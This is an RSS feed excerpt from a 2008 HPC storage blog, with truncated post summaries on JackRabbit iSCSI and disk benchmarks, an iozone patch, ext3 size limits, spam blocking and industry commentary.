      <description>root@jrs8:/opt/scalable/bin# bonnie++ -u root -d /big -f Using uid:0, gid:0. Writing intelligently...done Rewriting...done Reading intelligently...done start &#39;em...done...done...done... Create files in sequential order...done. Stat files in sequential order...done. Delete files in sequential order...done. Create files in random order...done. Stat files in random order...done. Delete files in random order...done. Version 1.03 ------Sequential Output------ --Sequential Input- --Random- -Per Chr- --Block-- -Rewrite- -Per Chr- --Block-- --Seeks-- Machine Size K/sec %CP K/sec %CP K/sec %CP K/sec %CP K/sec %CP /sec %CP jrs8 32096M 570921 83 142287 22 259411 19 773.</description>
    </item>
    
    <item>
      <title>Updated iSCSI numbers</title>
      <link>https://blog.scalability.org/2008/03/updated-iscsi-numbers/</link>
      <pubDate>Wed, 12 Mar 2008 06:37:49 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/03/updated-iscsi-numbers/</guid>
      <description>to disk, real disk, not nullio. Single JackRabbit over 10 GbE NIC to another single JackRabbit iSCSI unit.
buffered writes: root@jrs8:/opt/scalable/bin# dd if=/dev/zero of=/big/local.file bs=8M count=10000 10000+0 records in 10000+0 records out 83886080000 bytes (84 GB) copied, 167.568 seconds, 501 MB/s buffered reads: root@jrs8:/opt/scalable/bin# dd if=/big/local.file of=/dev/null bs=8M 10000+0 records in 10000+0 records out 83886080000 bytes (84 GB) copied, 322.052 seconds, 260 MB/s unbuffered writes: root@jrs8:/opt/scalable/bin# dd if=/dev/zero of=/big/local.file bs=8M count=10000 oflag=direct 10000+0 records in 10000+0 records out 83886080000 bytes (84 GB) copied, 202.</description>
    </item>
    
    <item>
      <title>Too cool ...</title>
      <link>https://blog.scalability.org/2008/03/too-cool/</link>
      <pubDate>Wed, 12 Mar 2008 05:25:46 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/03/too-cool/</guid>
      <description>VCwear &amp;ldquo;Don&amp;rsquo;t pitch me, bro&amp;rdquo; :)</description>
    </item>
    
    <item>
      <title>Dear spam-meisters of the world</title>
      <link>https://blog.scalability.org/2008/03/dear-spam-meisters-of-the-world/</link>
      <pubDate>Tue, 11 Mar 2008 13:04:17 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/03/dear-spam-meisters-of-the-world/</guid>
      <description>I am a (semi)poly-glot. Fluent (or barely so) in 2 languages. Can read characters of a third. If you push me hard (or give me time), I can even create my own mappings for a fourth (I did this with German and Cyrillic/Russian when I visited Vienna and saw a war memorial).
But, and this is the important thing, I don&amp;rsquo;t know any of the rather large variety of languages you are sending spam to me in.</description>
    </item>
    
    <item>
      <title>Wow ...</title>
      <link>https://blog.scalability.org/2008/03/wow/</link>
      <pubDate>Mon, 10 Mar 2008 16:33:24 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/03/wow/</guid>
      <description>some time in the last few days we hit 100k views. Well, this is a little misleading, as I installed that plugin about halfway through the life of this blog, and from what I have seen of the logs, the plugin counter is missing ~40% of the views (usually one page referrals). It also ignores the rss feeds. As it turns out, this is important. What is interesting is looking on number of subscribers on google reader and others.</description>
    </item>
    
    <item>
      <title>Sherlock Holmes moment</title>
      <link>https://blog.scalability.org/2008/03/sherlock-holmes-moment/</link>
      <pubDate>Mon, 10 Mar 2008 16:26:58 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/03/sherlock-holmes-moment/</guid>
      <description>Read this at /. I guess it is not surprising that people would attempt to influence market forces to adjust the price they pay for labor. Increase the talent pool, and competition grows, lowering the price. Cool idea. [please note that this is dripping with sarcasm &amp;hellip; I am an avowed capitalist and do not believe that market manipulation is a good thing &amp;hellip; the invisible hand as it were, has a tendency to respond to market forces] We have seen this before though, in other labor markets.</description>
    </item>
    
    <item>
      <title>Intel e5405</title>
      <link>https://blog.scalability.org/2008/03/intel-e5405/</link>
      <pubDate>Mon, 10 Mar 2008 03:25:51 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/03/intel-e5405/</guid>
      <description>We are building a new version of a JackRabbit for a customer. During some of our testing, we booted it running SuSE 10.2 diskless, and I ran a GAMESS benchmark. We have been using this for years to exercise machines, and get rough performance comparisons. On 4 CPU Opteron 275&amp;rsquo;s with 8 GB ram, it takes ~3 hours. So I ran it recently on an AMD 2350 2.0 GHz quad core and our new JackRabbit.</description>
    </item>
    
    <item>
      <title>iozone patch to allow for larger tests</title>
      <link>https://blog.scalability.org/2008/03/iozone-patch-to-allow-for-larger-tests/</link>
      <pubDate>Mon, 10 Mar 2008 01:24:00 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/03/iozone-patch-to-allow-for-larger-tests/</guid>
      <description>As noted a few times here, iozone as written, has numerous hard-wired quantities within it, some of which impede testing for large and fast systems. Here is a simple patch to fix one of the issues &amp;hellip;
diff -uNr iozone3_283/src/current/iozone.c iozone3_283.new/src/current/iozone.c --- iozone3_283/src/current/iozone.c 2007-02-19 12:12:18.000000000 -0500 +++ iozone3_283.new/src/current/iozone.c 2007-09-12 11:47:19.000000000 -0400 @@ -741,7 +741,7 @@ /* At 16 Meg switch to large records */ #define CROSSOVER (16*1024) /* Maximum buffer size*/ -#define MAXBUFFERSIZE (16*1024*1024) +#define MAXBUFFERSIZE (1024*1024*1024) #endif /* Maximum number of children.</description>
    </item>
    
    <item>
      <title>sometimes ya gots to shakes ya head in disbelief</title>
      <link>https://blog.scalability.org/2008/03/sometimes-ya-gots-to-shakes-ya-head-in-disbelief/</link>
      <pubDate>Fri, 07 Mar 2008 16:43:23 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/03/sometimes-ya-gots-to-shakes-ya-head-in-disbelief/</guid>
      <description>We submitted a bid for a cluster. A large one, and we were being very aggressive on price. Very thin margins, spoke with our suppliers to make sure we got the best deal we could get. Come the bid open and &amp;hellip; we are on the high side. Some of the bids are lower than our cost of materials. Ok, if everyone is bidding the same thing, how is this possible?</description>
    </item>
    
    <item>
      <title>New blog worth reading</title>
      <link>https://blog.scalability.org/2008/03/new-blog-worth-reading/</link>
      <pubDate>Fri, 07 Mar 2008 01:28:51 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/03/new-blog-worth-reading/</guid>
      <description>My friend Doug O&amp;rsquo;Flaherty has a new blog. I won&amp;rsquo;t mention Doug&amp;rsquo;s affiliation, as this is not actually part of his online persona &amp;hellip; he is not a corporate blogger. My take is that he wanted to talk about what he was seeing, thinking, and hearing in sections of the HPC market. Well worth the read, and as always, Doug is insightful and incisive. Adding it to my blogroll.</description>
    </item>
    
    <item>
      <title>World record data transfer with a JackRabbit? ... well ... no ...</title>
      <link>https://blog.scalability.org/2008/03/world-record-data-transfer-with-a-jackrabbit-well-no/</link>
      <pubDate>Wed, 05 Mar 2008 03:03:47 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/03/world-record-data-transfer-with-a-jackrabbit-well-no/</guid>
      <description>On Sunday 2-March-2008, 18TB of data was moved 1050 km in 12 hours. The network fabric and technology that brought this to being? The US interstate system, and our truck. Physical transport of media is still the bandwidth leader.
This means that the interstate system transported about 1.5 TB/hour, or 0.42 GB/s (420 MB/s). And yes, a JackRabbit did make its way across Ohio, West Virginia, Virginia, and finally came to rest in its new home in North Carolina.</description>
    </item>
    
    <item>
      <title>Windows server 2008:  sounds quite interesting</title>
      <link>https://blog.scalability.org/2008/02/windows-server-2008-sounds-quite-interesting/</link>
      <pubDate>Fri, 29 Feb 2008 18:22:25 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/02/windows-server-2008-sounds-quite-interesting/</guid>
      <description>Componentized, stripped of all garbage^H^H^H^H^H^H^H^Hthings you don&amp;rsquo;t need in a server, modularized &amp;hellip; Ok, so when can we play with it to see if it takes to our JackRabbits and clusters? We are loading almost all our OSes via diskless/CF, and I would love to do this with WS2k8. That and I want to get iozone, bonnie, and other tools ported. Our io-bm should work nicely, all we need is an MPI stack, and we can do parallel IO.</description>
    </item>
    
    <item>
      <title>If this is true, then it is almost a good thing</title>
      <link>https://blog.scalability.org/2008/02/if-this-is-true-then-it-is-almost-a-good-thing/</link>
      <pubDate>Wed, 27 Feb 2008 15:51:17 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/02/if-this-is-true-then-it-is-almost-a-good-thing/</guid>
      <description>Read this, from this morning on /. . In short, Microsoft will implement its own GNU-compatible environment. Why is it almost a good thing? Simple. There exists a great environment now, for all of this. Called Cygwin. I had been trying to convince the Microsoft people for a while now to get behind this effort, and support it wholeheartedly, on Windows. I made the point to Kyril Faenov at SC07, and to multiple others at Microsoft for the past 2+ years.</description>
    </item>
    
    <item>
      <title>Compact flash booting for SuSE, RHEL, OpenFiler, Ubuntu</title>
      <link>https://blog.scalability.org/2008/02/compact-flash-booting-for-suse-rhel-openfiler-ubuntu/</link>
      <pubDate>Tue, 26 Feb 2008 02:12:31 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/02/compact-flash-booting-for-suse-rhel-openfiler-ubuntu/</guid>
      <description>Well, we did it. We now have 4 GB CF images to boot our JackRabbits from SuSE 10.2 and 10.3, RHEL 4 and 5, OpenFiler 2.2 (2.3 also works), and Ubuntu. This is nice in that it is simple to replicate our installs. Installing SuSE 10.2 is painful (Zenworks &amp;hellip; that&amp;rsquo;s all you have to say). Myricom 10 GbE drivers, and we will make sure we have the Intel ixgbe drivers as well.</description>
    </item>
    
    <item>
      <title>multi-&gt;many core</title>
      <link>https://blog.scalability.org/2008/02/multi-many-core/</link>
      <pubDate>Mon, 25 Feb 2008 16:34:47 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/02/multi-many-core/</guid>
      <description>For a while now, privately, and publicly, I have been suggesting to the good folks at AMD that they ought to build an 8 core chip, literally by gluing two quad-core Barcelonas onto a die and connecting them with HyperTransport. The point I have been making is that Intel is going to do something like this, really soon, and if they wish to compete, they ought to get to market first with their version.</description>
    </item>
    
    <item>
      <title>Interesting take on bad CIOs, and some of the things they do ...</title>
      <link>https://blog.scalability.org/2008/02/interesting-take-on-bad-cios-and-some-of-the-things-they-do/</link>
      <pubDate>Sat, 23 Feb 2008 13:15:19 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/02/interesting-take-on-bad-cios-and-some-of-the-things-they-do/</guid>
      <description>/. linked to this story on cio.com. I read it, and there are some gems. Things I have seen corporate IT leadership folks do. While reading it, I was thinking &amp;ldquo;gee, wouldn&amp;rsquo;t it be funny if the problem of vendor favoritism showed up?&amp;rdquo;. That is, when specific vendors are chosen above others, not because of technological reasons, or valid business reasons, but because the CIO or IT leader wants to do business with people they know.</description>
    </item>
    
    <item>
      <title>Target ubiquity: a business model for accelerators in HPC</title>
      <link>https://blog.scalability.org/2008/02/target-ubiquity-a-business-model-for-accelerators-in-hpc/</link>
      <pubDate>Fri, 22 Feb 2008 19:02:21 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/02/target-ubiquity-a-business-model-for-accelerators-in-hpc/</guid>
      <description>I am a strong proponent of APUs, and accelerators in general. It is fairly obvious that the explosion in cores on single sockets results in a bandwidth wall that we have to work around. The reason for many more cores, and for SSE and other techniques, is fundamentally to increase the number of processor cycles available per unit time. SSE attempts to increase the efficiency of these cycles by allowing them to do more work per cycle.</description>
    </item>
    
    <item>
      <title>HPC market data from IDC</title>
      <link>https://blog.scalability.org/2008/02/hpc-market-data-from-idc/</link>
      <pubDate>Thu, 21 Feb 2008 18:24:57 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/02/hpc-market-data-from-idc/</guid>
      <description>As reported on HPCWire. Major features:
 * Server portion of the market is $11.6B, growing at a 15.5% CAGR
 * Over 5 years (2002-2007) the HPC server market has grown 134%, and is projected to reach $15B by 2011

What is interesting is that some of the markets grew in different ways than in the past.

 * The larger systems (&amp;gt;$500k) grew at 24% year-over-year to $3.2B.
 * Divisional systems ($250-499k) grew 19% to $1.</description>
    </item>
    
    <item>
      <title>They&#39;re back!!!</title>
      <link>https://blog.scalability.org/2008/02/theyre-back/</link>
      <pubDate>Wed, 20 Feb 2008 15:05:10 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/02/theyre-back/</guid>
      <description>[Cue scary music]
[ ](/images/they-are-back.png)
Ok, firewall rules turned on again. Hey DoSer &amp;hellip; this gets old. We are blocking all mail from .isp.att.net and dnsvr.com. Feel free to do the same. Update: Firewall rules on, DoSer goes buh-bye. Folks, we need to have zero tolerance for this behavior. Bug me offline if you want to see our blocklist for them.</description>
    </item>
    
    <item>
      <title>There are reports and studies, and there is reality ...</title>
      <link>https://blog.scalability.org/2008/02/there-are-reports-and-studies-and-there-is-reality/</link>
      <pubDate>Wed, 20 Feb 2008 14:00:17 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/02/there-are-reports-and-studies-and-there-is-reality/</guid>
      <description>I have noticed something recently. Others have noticed it as well. It is hard to find talent in Linux and OSS technologies. Now before the crowds of gleeful non-OSS companies get on a marketing roll here, and quote me out of context (gee, like that&amp;rsquo;s never happened), it is worth asking the question &amp;ldquo;why&amp;rdquo;.
It&amp;rsquo;s not because they aren&amp;rsquo;t out there. No. There are lots. It is because most of the ones I have spoken to, in trying to offload some of our work, are themselves overloaded and busy.</description>
    </item>
    
    <item>
      <title>Every now and then you are reminded ...</title>
      <link>https://blog.scalability.org/2008/02/every-now-and-then-you-are-reminded/</link>
      <pubDate>Wed, 20 Feb 2008 06:27:51 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/02/every-now-and-then-you-are-reminded/</guid>
      <description>&amp;hellip; that people don&amp;rsquo;t know about your products. Robin at StorageMojo reported on the death of Apple&amp;rsquo;s Xserve/Xraid unit. He noted &amp;hellip;
then asked
We can quote 24, 36, and 48 TB chunks, all under $1/GB. I left a note in his comments, and I hope it wasn&amp;rsquo;t inappropriate; just a short informational pointer. This shows that we have lots more work to do to get the message out. For those who didn&amp;rsquo;t see, we sustained 1.</description>
    </item>
    
    <item>
      <title>More company information:  ClearSpeed</title>
      <link>https://blog.scalability.org/2008/02/more-company-information-clearspeed/</link>
      <pubDate>Tue, 19 Feb 2008 19:45:22 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/02/more-company-information-clearspeed/</guid>
      <description>As I noted recently in the post on SGI, they are having a tough time of it, in large part due to who they are competing against, and what they have to use to compete with. Well, they aren&amp;rsquo;t the only company with issues. As noted on InsideHPC and elsewhere, ClearSpeed is not having a great time of it either.
[ ](http://finance.yahoo.com/q/bc?s=CSD.L&amp;amp;t=2y&amp;amp;l=on&amp;amp;z=m&amp;amp;q=l&amp;amp;c=)
Basically ClearSpeed makes accelerator CPUs. Each CPU has 96 cores laid out in a systolic array.</description>
    </item>
    
    <item>
      <title>Cray nails a large contract</title>
      <link>https://blog.scalability.org/2008/02/cray-nails-a-large-contract/</link>
      <pubDate>Tue, 19 Feb 2008 16:47:34 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/02/cray-nails-a-large-contract/</guid>
      <description>As InsideHPC reports, Cray has nailed a large DoD contract. Good for Cray. Sadly, they recently reported earnings that were not that great, and some publications have been beating on them a bit.
Cray is a good company. They have vision, and solid products. They are differentiated. They are not the low end of the market, though with a little work, I bet they could address it (and do so within their vision).</description>
    </item>
    
    <item>
      <title>A good question</title>
      <link>https://blog.scalability.org/2008/02/a-good-question/</link>
      <pubDate>Tue, 19 Feb 2008 02:42:35 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/02/a-good-question/</guid>
      <description>John at the always interesting InsideHPC asks a very important question that, oddly, I think I can answer.
The overall article is on the SGI salvage of LNXI assets. John&amp;rsquo;s question was
They are not. You can see it quite clearly on the financial charts
[ ](http://finance.yahoo.com/q/bc?s=SGIC&amp;amp;t=2y&amp;amp;l=on&amp;amp;z=m&amp;amp;q=l&amp;amp;c=)
The company&amp;rsquo;s stats can be read from the Yahoo page, go ahead and click the picture and you can see it. Their market cap is less than $200M.</description>
    </item>
    
    <item>
      <title>Why ext3 needs to go the way of the dodo ...</title>
      <link>https://blog.scalability.org/2008/02/why-ext3-needs-to-go-the-way-of-the-dodo/</link>
      <pubDate>Mon, 18 Feb 2008 16:30:49 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/02/why-ext3-needs-to-go-the-way-of-the-dodo/</guid>
      <description>root@pegasus-i:~# mdadm --create /dev/md0 --level=0 --raid-devices=2 /dev/sdc /dev/sdd
mdadm: array /dev/md0 started.
root@pegasus-i:~# cat /proc/mdstat
Personalities : [linear] [multipath] [raid0] [raid1] [raid6] [raid5] [raid4] [raid10]
md0 : active raid0 sdd[1] sdc[0]
      9765425152 blocks
root@pegasus-i:~# mkfs.ext3 /dev/md0
mke2fs 1.40.2 (12-Jul-2007)
mkfs.ext3: Filesystem too large.  No more than 2**31-1 blocks (8TB using a blocksize of 4k) are currently supported.
Stick a fork in it &amp;hellip; it&amp;rsquo;s done.</description>
    </item>
    
    <item>
      <title>iSCSI over 10GbE to real disk</title>
      <link>https://blog.scalability.org/2008/02/iscsi-over-10gbe-to-real-disk/</link>
      <pubDate>Sun, 17 Feb 2008 07:03:10 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/02/iscsi-over-10gbe-to-real-disk/</guid>
      <description>Simple-write/read show 450-550 MB/s to real disk. Bonnie++ &amp;hellip;
[root@pegasus-i io-bm]# bonnie++ -u root -d /big/ -f
Using uid:0, gid:0.
Writing intelligently...done
Rewriting...done
Reading intelligently...done
start &#39;em...done...done...done...
Create files in sequential order...done.
Stat files in sequential order...done.
Delete files in sequential order...done.
Create files in random order...done.
Stat files in random order...done.
Delete files in random order...done.
Version 1.03       ------Sequential Output------ --Sequential Input- --Random-
                   -Per Chr- --Block-- -Rewrite- -Per Chr- --Block-- --Seeks--
Machine       Size K/sec %CP K/sec %CP K/sec %CP K/sec %CP K/sec %CP  /sec %CP
pegasus-i   24008M           515250  88 246596  62           409339  90  254.</description>
    </item>
    
    <item>
      <title>How effective was our blocking of 2 networks for spam?</title>
      <link>https://blog.scalability.org/2008/02/how-effective-was-our-blocking-of-2-networks-for-spam/</link>
      <pubDate>Fri, 15 Feb 2008 19:24:56 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/02/how-effective-was-our-blocking-of-2-networks-for-spam/</guid>
      <description>Well &amp;hellip; judge for yourself.
[ ](/images/blocked.png)
Yahoo/ATT and the other guys &amp;hellip; you have a problem you need to address. Worth noting: The following are the IP/nets we are blocking access to port 25.
AT&amp;amp;T;/Yahoo: 207.115.11.0/24 204.127.217.0/24 DNSVR: 71.6.153.204 216.40.239.162 216.40.250.39  I do not believe in RBLs. Likely we are losing mail. But then again, the good folks at these sites did not seem to do more than auto-acknowledge my concerns over the use of their infrastructure to DoS us.</description>
    </item>
    
    <item>
      <title>LNXI (Linux Networx) is done</title>
      <link>https://blog.scalability.org/2008/02/lnxi-linux-networx-is-done/</link>
      <pubDate>Fri, 15 Feb 2008 13:28:55 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/02/lnxi-linux-networx-is-done/</guid>
      <description>SGI acquired the assets yesterday. Sad, LNXI was one of the good ones. Like us, a real HPC shop. They got killed (my guess) by going after huge government systems with long drawn out acceptance tests. Which killed their cash flow, and put them into an unsafe business area. Look, HPC is just like any other business, you have to be able to distinguish good business from bad business. Some business you cannot afford to pursue, the cost of winning is simply too high.</description>
    </item>
    
    <item>
      <title>In order to block spam, we are now rejecting all mail from isp.att.net</title>
      <link>https://blog.scalability.org/2008/02/in-order-to-block-spam-we-are-now-rejecting-all-mail-from-ispattnet/</link>
      <pubDate>Fri, 15 Feb 2008 01:49:18 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/02/in-order-to-block-spam-we-are-now-rejecting-all-mail-from-ispattnet/</guid>
      <description>I hope someone from isp.att.net reads this. I have sent email to abuse@att.net, to spam@att.net, and so on. I have filled out the necessary forms on their website. Yet, sadly, no response from them. So I have taken the most minimal of draconian measures. I put a simple rule in our mailer to automatically reject connections from isp.att.net. If this is problematic for you, please send me email at gmail.com. I am joe.</description>
    </item>
    
    <item>
      <title>Looks like Novell will get paid after all</title>
      <link>https://blog.scalability.org/2008/02/looks-like-novell-will-get-paid-after-all/</link>
      <pubDate>Fri, 15 Feb 2008 00:36:15 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/02/looks-like-novell-will-get-paid-after-all/</guid>
      <description>A company apparently has demonstrated the validity of a P.T. Barnum quote. SCO is going private. PJ at Groklaw has a note on this. So after this is over and SCO goes private, Novell ought to get its appropriate share of the roughly $50M of license revenue that SCO owes it &amp;hellip; right? Which leaves about $50M for the IBM lawyers to go after. Maybe the title should have been &amp;ldquo;night of the living dead&amp;rdquo;.</description>
    </item>
    
    <item>
      <title>Not bad:  1.3 GB/s on reads</title>
      <link>https://blog.scalability.org/2008/02/not-bad-13-gbs-on-reads/</link>
      <pubDate>Thu, 14 Feb 2008 19:08:51 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/02/not-bad-13-gbs-on-reads/</guid>
      <description>`root@jr1:~# ./simple-w3.bash
 sync echo -n &amp;lsquo;start at &#39; start at + date Thu Feb 14 13:33:03 EST 2008 dd if=/dev/zero of=/big/local.file.5962 bs=8388608 count=10000 oflag=direct 10000+0 records in 10000+0 records out 83886080000 bytes (84 GB) copied, 68.8322 seconds, 1.2 GB/s sync echo -n &amp;lsquo;stop at &#39; stop at + date Thu Feb 14 13:34:12 EST 2008 root@jr1:~# ./simple-w root@jr1:~# mv /big/local.file.5962 /big/local.file root@jr1:~# ./simple-read.bash sync echo -n &amp;lsquo;start at &#39; start at + date Thu Feb 14 13:34:32 EST 2008 dd if=/big/local.</description>
    </item>
    
    <item>
      <title>A baseline before tuning</title>
      <link>https://blog.scalability.org/2008/02/a-baseline-before-tuning/</link>
      <pubDate>Thu, 14 Feb 2008 13:38:52 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/02/a-baseline-before-tuning/</guid>
      <description>Building a large JackRabbit. 2 raid controllers, quite a few other goodies (CF boot!). Doing some testing for burn in, including our &amp;ldquo;simple-write&amp;rdquo; benchmark from a few posts ago. I haven&amp;rsquo;t done any tuning yet. Honest. The throttle is not cracked wide open, the JackRabbit is not running at full potential. It doesn&amp;rsquo;t even have its full complement of RAM, or cache. The folks shipping those to us shipped us the wrong RAM, so these are 2x 2GB sticks that we had for our testing unit.</description>
    </item>
    
    <item>
      <title>We&#39;ve got mail!!!</title>
      <link>https://blog.scalability.org/2008/02/weve-got-mail/</link>
      <pubDate>Wed, 13 Feb 2008 20:38:13 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/02/weve-got-mail/</guid>
      <description>Ok, we are being mailbombed as I write this. I know, I know, tin foil hats.
[ ](/images/mail-bombing-in-progress.png)
I don&amp;rsquo;t mean to taunt the folks doing this, but 6 messages per minute? C&amp;rsquo;mon. This system withstood 250k messages in a 12 hour period about 6 months ago. That&amp;rsquo;s 347/minute. I won&amp;rsquo;t tell you what the user load on the system was then, but it wasn&amp;rsquo;t high. Didn&amp;rsquo;t even break &amp;ldquo;1&amp;rdquo; as I remember &amp;hellip;.</description>
    </item>
    
    <item>
      <title>Whither LNXI?</title>
      <link>https://blog.scalability.org/2008/02/whither-lnxi/</link>
      <pubDate>Wed, 13 Feb 2008 19:38:50 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/02/whither-lnxi/</guid>
      <description>Rumors being reported by John at InsideHPC.com suggest LNXI may not be long for this world. It would be sad to see them go. I had heard things like this in the past, in large part due to the problematic acceptance schedules of the government. When you sell a big huge thing to the government, the government withholds payment until you can prove it is working to their satisfaction. This is called the acceptance test.</description>
    </item>
    
    <item>
      <title>New large JackRabbit being built, hopefully will have some benchmarks to go with it</title>
      <link>https://blog.scalability.org/2008/02/new-large-jackrabbit-being-built-hopefully-will-have-some-benchmarks-to-go-with-it/</link>
      <pubDate>Wed, 13 Feb 2008 19:02:39 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/02/new-large-jackrabbit-being-built-hopefully-will-have-some-benchmarks-to-go-with-it/</guid>
      <description>Working on it now. Quite a few orders last week, so we are trying to get them built as quickly as possible. Still, I want to do some more benchmarking and updates. We will have a JackRabbit-S benchmark document done soon. Our results from testing that unit suggest that the new unit we are building may be &amp;hellip; very interesting &amp;hellip; in real performance. Hopefully we will see, soon. Missing some of the memory (supplier shipped us the wrong parts), and have some minor physical build work to do &amp;hellip; hopefully building the rest of the unit out later on today.</description>
    </item>
    
    <item>
      <title>Fan-boy-ism and HPC</title>
      <link>https://blog.scalability.org/2008/02/fan-boy-ism-and-hpc/</link>
      <pubDate>Wed, 13 Feb 2008 18:39:05 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/02/fan-boy-ism-and-hpc/</guid>
      <description>I have had discussions in email groups recently where I encountered an interesting phenomenon. Call it corporate cheerleading, or &amp;ldquo;fanboy&amp;rdquo; behavior. The signatures of this phenomenon are
 * Tendency to repeat marketing material as if inherited from a higher deity
 * Tendency to attack other points of view not in line with their corporate-centric one
 * Tendency to attack posters of such views as being biased, and suggesting that competitive products that might be offered by the poster, but not mentioned or alluded to by the poster, somehow constitute bashing.</description>
    </item>
    
    <item>
      <title>New day job web site is live</title>
      <link>https://blog.scalability.org/2008/02/new-day-job-web-site-is-live/</link>
      <pubDate>Mon, 11 Feb 2008 15:11:51 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/02/new-day-job-web-site-is-live/</guid>
      <description>Feel free to check it out. Been wanting to get this done for a while, had the code mostly written. Some work we are doing prompted the completion. Now it is there&amp;hellip; The nice aspect is that we can change the look and feel at any point. The code base is also quite simple. Even though it is Ajaxy for the tab bar, it is also accessible (or should be) via the jQuery library&amp;rsquo;s degradation of functionality for non-JavaScript sites.</description>
    </item>
    
    <item>
      <title>Emergent behavior in complex systems ... or ... the fun of debugging your code</title>
      <link>https://blog.scalability.org/2008/02/emergent-behavior-in-complex-systems-or-the-fun-of-debugging-your-code/</link>
      <pubDate>Mon, 11 Feb 2008 01:55:42 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/02/emergent-behavior-in-complex-systems-or-the-fun-of-debugging-your-code/</guid>
      <description>Working on finally updating the day job&amp;rsquo;s web site. Expect it to go live in a day or less (less less!!!) Fixing some coding bits. At the end of the day, we had to choose between complex site building bits that sorta kinda worked, and our bits around DragonFly, that really did work, but required some coding. I didn&amp;rsquo;t want to write a website. Honest. I want there to be something akin to Powerpoint for web sites.</description>
    </item>
    
    <item>
      <title>iSCSI results for JackRabbit</title>
      <link>https://blog.scalability.org/2008/02/iscsi-results-for-jackrabbit/</link>
      <pubDate>Fri, 08 Feb 2008 03:02:17 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/02/iscsi-results-for-jackrabbit/</guid>
      <description>As you might know, we have been trying out a 10 GbE iSCSI connection to our JackRabbit server. We will be writing up a white paper about this later on. The issue I keep running into was not having a real benchmark test. Most of the benchmark tests we have seen have been, well, completely artificial, in that end user work loads aren&amp;rsquo;t anything like that. We want to try to test end user work loads whenever possible.</description>
    </item>
    
    <item>
      <title>Quads are in, and work ... wish the power supply did ...</title>
      <link>https://blog.scalability.org/2008/02/quads-are-in-and-work-wish-the-power-supply-did/</link>
      <pubDate>Fri, 08 Feb 2008 03:01:49 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/02/quads-are-in-and-work-wish-the-power-supply-did/</guid>
      <description>I got the quads, and put the MB into the machine, replacing the old MB. 64 GB capable MB with quad core AMDs. Plug it in, turn it on and &amp;hellip; whrrrr &amp;hellip;. whrrr &amp;hellip;. whrrrr &amp;hellip; Nada &amp;hellip; nothing. No boot. POST BIOS code is FF. Of course FF is not in the manual&amp;rsquo;s listing of all the POST codes. Go figure.
Fine. Pull the MB out, put the old one in, the one I just pulled out to put this one in.</description>
    </item>
    
    <item>
      <title>Testing iSCSI over 10 GbE, iSER over IB, SRPT over IB, ...</title>
      <link>https://blog.scalability.org/2008/02/testing-iscsi-over-10-gbe-iser-over-ib-srpt-over-ib/</link>
      <pubDate>Fri, 08 Feb 2008 01:39:55 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/02/testing-iscsi-over-10-gbe-iser-over-ib-srpt-over-ib/</guid>
      <description>This will be short, no long discussion of benchmarks. Basically we tried JackRabbit as a target for many block oriented protocols. With 10 GbE, and with IB. I thought 10 GbE would be badly beaten by IB in performance (real world, no ram disks here).
I think I was wrong. 10 GbE based iSCSI was quite simple to set up, pretty easy to tune, and actually nice to work with. Compare this to building SCST-SRPT or the right version of iSER or the correctly patched OFED for SCSI-TGT, or &amp;hellip; I like IB.</description>
    </item>
    
    <item>
      <title>SRP target oddities in RHEL/Centos 5.1</title>
      <link>https://blog.scalability.org/2008/02/srp-target-oddities-in-rhelcentos-51/</link>
      <pubDate>Thu, 07 Feb 2008 06:52:24 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/02/srp-target-oddities-in-rhelcentos-51/</guid>
      <description>A customer will be running RHEL/Centos 5.1 and wants to attach to a JackRabbit for high performance storage. Should be possible with iSCSI, though it looks like the single connection of the iSCSI initiator limits performance. At first I thought it was card related, though I now see multiple other cards that exhibit very similar performance issues. In fact our numbers are remarkably similar, though their performance was measured relative to ramdisk, and ours relative to JackRabbit disk.</description>
    </item>
    
    <item>
      <title>Found ... a pair of quads ..</title>
      <link>https://blog.scalability.org/2008/02/found-a-pair-of-quads/</link>
      <pubDate>Wed, 06 Feb 2008 19:15:26 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/02/found-a-pair-of-quads/</guid>
